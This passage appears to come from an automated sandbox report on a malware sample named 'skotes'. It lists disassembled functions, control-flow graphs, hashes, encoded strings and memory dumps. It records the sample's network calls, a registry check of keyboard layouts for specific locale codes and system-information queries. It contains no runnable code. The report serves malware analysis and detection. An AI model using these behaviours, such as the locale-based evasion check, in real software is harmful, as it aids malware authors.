                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
                                                                                                                                              • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$invalid stoi argument$stoi argument out of range
                                                                                                                                              • API String ID: 1439999335-885246636
                                                                                                                                              • Opcode ID: 1518eb687004853efa29c5db6eb4ac80e37a3f0bc210497c56dc98a92a7baf35
                                                                                                                                              • Instruction ID: f4929b86adc9e75eb2c0190ee11448700fde9bf918225e6129556df98cebc324
                                                                                                                                              • Opcode Fuzzy Hash: 1518eb687004853efa29c5db6eb4ac80e37a3f0bc210497c56dc98a92a7baf35
                                                                                                                                              • Instruction Fuzzy Hash: BFB1C2B1A10118DBDB24CF28CC84B9E7A65EF45304F5042AEF909A72D1D7789AC4CB99
                                                                                                                                              Function 00406020 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 275registryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1424 406020-40619d call 41e150 call 4180c0 * 5 RegOpenKeyExA 1437 4064b1-4064ba 1424->1437 1438 4061a3-406233 call 4340f0 1424->1438 1439 4064e7-4064f0 1437->1439 1440 4064bc-4064c7 1437->1440 1468 406239-40623d 1438->1468 1469 40649f-4064ab 1438->1469 1444 4064f2-4064fd 1439->1444 1445 40651d-406526 1439->1445 1442 4064c9-4064d7 1440->1442 1443 4064dd-4064e4 call 41d663 1440->1443 1442->1443 1447 4065d7-4065df call 436c6a 1442->1447 1443->1439 1449 406513-40651a call 41d663 1444->1449 1450 4064ff-40650d 1444->1450 1451 406553-40655c 1445->1451 1452 406528-406533 1445->1452 1449->1445 1450->1447 1450->1449 1454 406585-40658e 1451->1454 1455 40655e-406569 1451->1455 1459 406535-406543 1452->1459 1460 406549-406550 call 41d663 1452->1460 1465 406590-40659f 1454->1465 1466 4065bb-4065d6 call 41cff1 1454->1466 1463 40657b-406582 call 41d663 1455->1463 1464 40656b-406579 1455->1464 1459->1447 1459->1460 1460->1451 1463->1454 1464->1447 1464->1463 1472 4065b1-4065b8 call 41d663 1465->1472 1473 4065a1-4065af 1465->1473 1475 406243-406279 RegEnumValueA 1468->1475 1476 406499 1468->1476 1469->1437 1472->1466 1473->1447 1473->1472 1478 406486-40648d 1475->1478 1479 40627f-40629e 1475->1479 1476->1469 1478->1475 1484 406493 1478->1484 1483 4062a0-4062a5 1479->1483 1483->1483 1486 4062a7-4062fb call 4180c0 call 417a00 * 2 call 405d50 1483->1486 1484->1476 1486->1478
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0040617D
                                                                                                                                              • RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00406271
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnumOpenValue
                                                                                                                                              • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                              • API String ID: 2571532894-3963862150
                                                                                                                                              • Opcode ID: a602cd8e7b0850ab84259d6aa7908dd137ddacf594454c55420b387fbbdb9bc7
                                                                                                                                              • Instruction ID: b72d8befcf04fcbf28a2d64e6541736625970e2e987c40f142a0de41feeda528
                                                                                                                                              • Opcode Fuzzy Hash: a602cd8e7b0850ab84259d6aa7908dd137ddacf594454c55420b387fbbdb9bc7
                                                                                                                                              • Instruction Fuzzy Hash: A1B1C171900168ABDB24DB14CC84BDEB7B9AF05304F5402EAE509F72D1DB785BE88F58
                                                                                                                                              Function 00407D30 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 426COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1497 407d30-407db2 call 4340f0 1501 408356-408373 call 41cff1 1497->1501 1502 407db8-407de0 call 417a00 call 405c10 1497->1502 1509 407de2 1502->1509 1510 407de4-407e06 call 417a00 call 405c10 1502->1510 1509->1510 1515 407e08 1510->1515 1516 407e0a-407e23 1510->1516 1515->1516 1519 407e54-407e7f 1516->1519 1520 407e25-407e34 1516->1520 1521 407eb0-407ed1 1519->1521 1522 407e81-407e90 1519->1522 1523 407e36-407e44 1520->1523 1524 407e4a-407e51 call 41d663 1520->1524 1527 407ed3-407ed5 GetNativeSystemInfo 1521->1527 1528 407ed7-407edc 1521->1528 1525 407e92-407ea0 1522->1525 1526 407ea6-407ead call 41d663 1522->1526 1523->1524 1529 408374 call 436c6a 1523->1529 1524->1519 1525->1526 1525->1529 1526->1521 1534 407edd-407ee6 1527->1534 1528->1534 1535 408379-40837f call 436c6a 1529->1535 1538 407f04-407f07 1534->1538 1539 407ee8-407eef 1534->1539 1540 4082f7-4082fa 1538->1540 1541 407f0d-407f16 1538->1541 1543 408351 1539->1543 1544 407ef5-407eff 1539->1544 1540->1543 1547 4082fc-408305 1540->1547 1545 407f18-407f24 1541->1545 1546 407f29-407f2c 1541->1546 1543->1501 1549 40834c 1544->1549 1545->1549 1550 407f32-407f39 1546->1550 1551 4082d4-4082d6 1546->1551 1552 408307-40830b 1547->1552 1553 40832c-40832f 1547->1553 1549->1543 1554 408019-4082bd call 417a00 call 405c10 call 417a00 call 405c10 call 405d50 call 417a00 call 405c10 call 405730 call 417a00 call 405c10 call 417a00 call 405c10 call 405d50 call 417a00 call 405c10 call 405730 call 417a00 call 405c10 call 417a00 call 405c10 call 405d50 call 417a00 call 405c10 call 405730 call 417a00 call 405c10 call 417a00 call 405c10 call 405d50 call 417a00 call 405c10 call 405730 1550->1554 1555 407f3f-407f9b call 417a00 call 405c10 call 417a00 call 405c10 call 405d50 1550->1555 1560 4082e4-4082e7 1551->1560 1561 4082d8-4082e2 1551->1561 1556 408320-40832a 1552->1556 1557 40830d-408312 1552->1557 1558 408331-40833b 1553->1558 1559 40833d-408349 1553->1559 1596 4082c3-4082cc 1554->1596 1583 407fa0-407fa7 1555->1583 1556->1543 1557->1556 1564 408314-40831e 1557->1564 1558->1543 1559->1549 1560->1543 1562 4082e9-4082f5 1560->1562 1561->1549 1562->1549 1564->1543 1585 407fa9 1583->1585 1586 407fab-407fcb call 438bbe 1583->1586 1585->1586 1591 408002-408004 1586->1591 1592 407fcd-407fdc 1586->1592 1591->1596 1597 40800a-408014 1591->1597 1594 407ff2-407fff call 41d663 1592->1594 1595 407fde-407fec 1592->1595 1594->1591 1595->1535 1595->1594 1596->1540 1601 4082ce 1596->1601 1597->1596 1601->1551
                                                                                                                                              APIs
                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407ED3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoNativeSystem
                                                                                                                                              • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                                                                                                                              • API String ID: 1721193555-3123340372
                                                                                                                                              • Opcode ID: 5a3a65f84bd1e4191d0a422afb85bbe076af315937cb0c2cc4c5e6db1b321f7a
                                                                                                                                              • Instruction ID: 9f7ef5bd834e15217ce0e6cbf456c9b0ec5c4a66442bea978885161577b3df54
                                                                                                                                              • Opcode Fuzzy Hash: 5a3a65f84bd1e4191d0a422afb85bbe076af315937cb0c2cc4c5e6db1b321f7a
                                                                                                                                              • Instruction Fuzzy Hash: C4E12B70E00654A7DB14BB28CD0B39E7671AB82714F5442AEE815773C2DB7D4E858BCB
                                                                                                                                              Function 00441ABC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1651 441abc-441aec call 44180a 1654 441b07-441b13 call 43bf3a 1651->1654 1655 441aee-441af9 call 4375e3 1651->1655 1661 441b15-441b2a call 4375e3 call 4375f6 1654->1661 1662 441b2c-441b75 call 441775 1654->1662 1660 441afb-441b02 call 4375f6 1655->1660 1671 441de1-441de5 1660->1671 1661->1660 1669 441b77-441b80 1662->1669 1670 441be2-441beb GetFileType 1662->1670 1673 441bb7-441bdd call 4375c0 1669->1673 1674 441b82-441b86 1669->1674 1675 441c34-441c37 1670->1675 1676 441bed-441c1e call 4375c0 1670->1676 1673->1660 1674->1673 1678 441b88-441bb5 call 441775 1674->1678 1679 441c40-441c46 1675->1679 1680 441c39-441c3e 1675->1680 1676->1660 1698 441c24-441c2f call 4375f6 1676->1698 1678->1670 1678->1673 1683 441c4a-441c98 call 43be85 1679->1683 1684 441c48 1679->1684 1680->1683 1693 441cb7-441cdf call 441522 1683->1693 1694 441c9a-441ca6 call 441984 1683->1694 1684->1683 1702 441ce4-441d25 1693->1702 1703 441ce1-441ce2 1693->1703 1694->1693 1704 441ca8 1694->1704 1698->1660 1707 441d46-441d54 1702->1707 1708 441d27-441d2b 1702->1708 1705 441caa-441cb2 call 43af48 1703->1705 1704->1705 1705->1671 1711 441ddf 1707->1711 1712 441d5a-441d5e 1707->1712 1708->1707 1710 441d2d-441d41 1708->1710 1710->1707 1711->1671 1712->1711 1714 441d60-441d93 call 441775 1712->1714 1718 441d95-441dc1 call 4375c0 call 43c04d 1714->1718 1719 441dc7-441ddb 1714->1719 1718->1719 1719->1711
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00441775: CreateFileW.KERNEL32(00000000,00000000,?,00441B65,?,?,00000000,?,00441B65,00000000,0000000C), ref: 00441792
                                                                                                                                              • __dosmaperr.LIBCMT ref: 00441BD7
                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 00441BE3
                                                                                                                                              • __dosmaperr.LIBCMT ref: 00441BF6
                                                                                                                                              • __dosmaperr.LIBCMT ref: 00441D9C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
